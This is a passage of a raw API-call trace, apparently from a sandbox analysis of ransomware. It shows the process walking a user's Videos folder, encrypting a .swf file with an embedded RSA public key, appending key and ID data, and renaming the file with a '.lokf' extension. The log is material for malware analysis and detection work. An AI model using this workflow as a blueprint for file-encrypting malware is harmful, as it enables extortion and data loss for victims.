[0060.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.560] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71502390, ftCreationTime.dwHighDateTime=0x1d4d160, ftLastAccessTime.dwLowDateTime=0xe161ffe0, ftLastAccessTime.dwHighDateTime=0x1d4d25b, ftLastWriteTime.dwLowDateTime=0xe161ffe0, ftLastWriteTime.dwHighDateTime=0x1d4d25b, nFileSizeHigh=0x0, nFileSizeLow=0x9da5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3ReWfL7YLyi_9fKl.swf", cAlternateFileName="3REWFL~1.SWF")) returned 1 [0060.560] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\3ReWfL7YLyi_9fKl.swf") returned=".swf" [0060.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\3ReWfL7YLyi_9fKl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\3rewfl7ylyi_9fkl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.560] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=40357) returned 1 [0060.560] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.563] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9d7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.563] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.564] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x9da5, lpOverlapped=0x0) returned 1 [0060.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.564] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.565] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.565] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.565] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.565] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.565] GetLastError () returned 0x0 [0060.565] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.565] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.565] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.565] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.565] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.565] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.565] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f08 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85ef0 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.566] GetCurrentThreadId () returned 0x9e0 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b060 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.566] GetCurrentThreadId () returned 0x9e0 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ef0 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f08 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ed8 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f20 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ef0 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89640 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.570] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x9da0, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x9da0, lpOverlapped=0x0) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.570] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9da5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.570] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.570] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.570] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.570] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.570] CloseHandle (hObject=0x5cc) returned 1 [0060.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.572] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\3ReWfL7YLyi_9fKl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\3rewfl7ylyi_9fkl.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\3ReWfL7YLyi_9fKl.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\3rewfl7ylyi_9fkl.swf.lokf")) returned 1 [0060.572] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.572] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.572] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.573] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.573] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8641a7d0, ftCreationTime.dwHighDateTime=0x1d4c9cf, ftLastAccessTime.dwLowDateTime=0x4bf4a5b0, ftLastAccessTime.dwHighDateTime=0x1d4cb9f, ftLastWriteTime.dwLowDateTime=0x4bf4a5b0, ftLastWriteTime.dwHighDateTime=0x1d4cb9f, nFileSizeHigh=0x0, nFileSizeLow=0x12852, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C47 OYV277RnlFF.avi", cAlternateFileName="4C47OY~1.AVI")) returned 1 [0060.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.573] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.573] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m 